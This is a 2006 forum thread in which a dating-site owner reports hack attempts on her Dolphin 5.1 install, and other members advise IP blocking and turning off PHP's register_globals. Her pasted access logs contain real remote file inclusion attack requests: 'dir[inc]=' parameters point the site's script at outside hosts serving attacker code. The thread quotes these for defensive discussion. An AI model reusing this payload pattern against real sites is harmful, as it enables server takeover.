sillywabbit

Hi guys....
(Please forgive me Smoge if this is not good to post or the wrong place to post it).

I am posting this just for an FYI... especially to those who maybe running dolphin 5.1

I have had SEVERAL hack attempts on my site the last few days. I have also had alot of issues with spammers (now have up the .htaccess file... thanx guys!!). Because of the issues with the spammers, I was keeping a close eye on the stats. I noticed that I was getting several hits from searches coming from various search engines with the keywords being "2002-2006. product of boonex group."...... I thought this was rather strange.

Then I began noticing some file manipulation tactics in the stats and so I contacted my hosting company (I am a new customer with hostgator.com and a happy one!!).
Hostgator showed me that there is an exploit in 5.1
look here:
http://securitytracker.com/alerts/2006/Aug/1016692.html

I noticed that most of the IPs were in Amsterdam and Asia. I am hoping that the .htaccess file will take care of most of the banning of the IPs. Lots of bandwidth has been getting chewed by the hack attempts and the spammers

I guess that hack attempts are always going to be inevitable... but to be honest... has left me feeling a bit shaken up.

This is what they looked like in the latest visitor stats:

Host: 85.249.133.178 /favicon.ico
Http Code: 404 Date: Aug 22 14:15:37 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7

|
|
|
/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://forbidden-instincts.com/x?
Http Code: 406 Date: Aug 22 14:16:42 Http Version: HTTP/1.1 Size in Bytes: 382
Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7








Host: 84.244.143.59 /favicon.ico
Http Code: 404 Date: Aug 22 13:46:11 Http Version: HTTP/1.0 Size in Bytes: -
Referer: -
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6

|
|
|
/templates/tmpl_dfl/scripts/index.php?img=2
Http Code: 200 Date: Aug 22 13:47:21 Http Version: HTTP/1.0 Size in Bytes: 419
Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6

|
|
|
/templates/tmpl_dfl/scripts/index.php?img=1
Http Code: 200 Date: Aug 22 13:47:21 Http Version: HTTP/1.0 Size in Bytes: 419
Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6

|
|
|
/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://amrdiab.ir/cgi-bin/hadi.txt%3f
Http Code: 200 Date: Aug 22 13:47:25 Http Version: HTTP/1.0 Size in Bytes: 421
Referer: http://www.christiandatingandchat.co.../index.php?dir[inc]=http:/
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6




Host: 202.154.186.30 /about_us.php
Http Code: 200 Date: Aug 22 12:39:08 Http Version: HTTP/1.0 Size in Bytes: 14508
Referer: http://a9.com/%22powered%20by%20Dolphin%22?pm=3
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

|
|
|
/templates/tmpl_dfl/css/general.css
Http Code: 200 Date: Aug 22 12:39:15 Http Version: HTTP/1.0 Size in Bytes: 12665
Referer: http://www.christiandatingandchat.com/about_us.php
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

|
|
|
/templates/tmpl_dfl/css/anchor.css
Http Code: 200 Date: Aug 22 12:39:28 Http Version: HTTP/1.0 Size in Bytes: 503
Referer: http://www.christiandatingandchat.com/about_us.php
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

|
|
|
/favicon.ico
Http Code: 404 Date: Aug 22 12:39:35 Http Version: HTTP/1.0 Size in Bytes: -
Referer: -
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

|
|
|
/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://redhat.scient.co.jp/manual/crb.jpg?
Http Code: 200 Date: Aug 22 12:40:57 Http Version: HTTP/1.0 Size in Bytes: 4868
Referer: -
Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

__________________
http://www.christiandatingandchat.com
Abledating 2.4.11A

http://www.thefuzzypeach.com/dating
6.02
********************
It's not the load that breaks you down; it's the way you carry it.
--Lena Horne
********************

sillywabbit

I am getting very frustrated right now.
I uploaded that .htaccess file and was hoping that would take care of much of the unwanted traffic.
This morning upon checking the stats though... I have discovered that I havent had any traffic from Africa... although I am still getting the hackers visiting from Amsterdam and Asia and they are chewing up a ton of bandwidth. Amsterdam chewed up 10MB just this morning. I have been blocking individual IPs but they just seem to come back on a new one.
I dont get if they are just stupid or what.... but they are still trying to take the site down through that exploit that was in 5.1....... but it should be obvious to them now... that I am running 5.2 and its just not going to work.

Is this something that I just need to ignore and accept the chewed bandwidth and the hack attempts? Part of the business so to speak?

Thanks,
Ann

__________________
http://www.christiandatingandchat.com
Abledating 2.4.11A

http://www.thefuzzypeach.com/dating
6.02
********************
It's not the load that breaks you down; it's the way you carry it.
--Lena Horne
********************

ijk

Try going to www.dnsstuff.com and get more information about the ipaddress.
also find out if the servers are blacklisted.
You will need to block ip ranges which you can get on entering an ip in dnsstuff.com.

To get an idea of ip range to block check this out.
http://jodies.de/ipcalc


Now depends on how ruthless you want to be. If you start blocking ip ranges soon you will have them all blocked out but quiet a few innoncent chaps as well so it is a balancing act.

also block free proxy servers.

should get more info here
http://www.de.sorbs.net/

__________________
AE Version 4.0 IQ

sillywabbit

Thanks so much for the info....

Have been down with the flu..... but will start checking into this ... Still the same thing going on..... mostly again..... from Amsterdam and Asia...

Thanks again,
Ann

__________________
http://www.christiandatingandchat.com
Abledating 2.4.11A

http://www.thefuzzypeach.com/dating
6.02
********************
It's not the load that breaks you down; it's the way you carry it.
--Lena Horne
********************

Smoge

Hi,

This is what we needed - some log entries.... we have now identified the hack...

Sorry I did not see SillyWabbits post eariler - I had a busy week last week.

Does anyone know if BoonEx has made any announcements or comments about this issue yet?

Smoge

__________________
ModMySite Administrator

Problems? Questions? Need modifications or other help with your site?

Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.

Fuelme

Haven't seen anything on their free forums. Someone did have a link to here, and I have been able to find out more about the program here than at boonex, so I added a link here as well

__________________
Running Dolphin 5.2 Nulled

Smoge

Well.... in reality - you should not run your server with "Register Globals" turned on.

You can check this if you make your own phpinfo file - and run it from your web browser. You can also find phpinfo in many server control panels.

make a file called phpinfo3838.php (or some other random number - so others can not easily run it!), with this inside.

Upload it to your webspace. Run from web browser.

If register globals says OFF OFF - you are ok.

If register globals is on, you need to ask your sysadmin why - or if you are the sysadmin - ask yourself why.

Register Globals is known to cause security issues with many scripts - not just aedating/dolphin.

Having it on is not recommended or desired for (almost all) php code users.

Smoge

__________________
ModMySite Administrator

Problems? Questions? Need modifications or other help with your site?

Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.

Smoge

Oh - and I should add..... if you have register globals off - and you see this stuff in your apache logs - just disregard as another hack "attempt" - not success.

I am willing to bet - but only she knows - that SillyWabbit's register globals is off too. Maybe she can check and tell us.

Smoge

__________________
ModMySite Administrator

Problems? Questions? Need modifications or other help with your site?

Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.

Fuelme

i went to her site a little bit ago and it looks like she took dolphin off and is putting up osdate.
Just a FYI

__________________
Running Dolphin 5.2 Nulled

Smoge

Yes - this is talked about in another post.

http://www.modmysite.com/dolphin-general-discussion-v5-0-v5-21/3140-i-dont-get.html

While it is good that SillyWabbit is concerned about security - so far, perhaps - both of her concerns were not warranted (assuming she has register_globals disabled)

Smoge

__________________
ModMySite Administrator

Problems? Questions? Need modifications or other help with your site?

Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.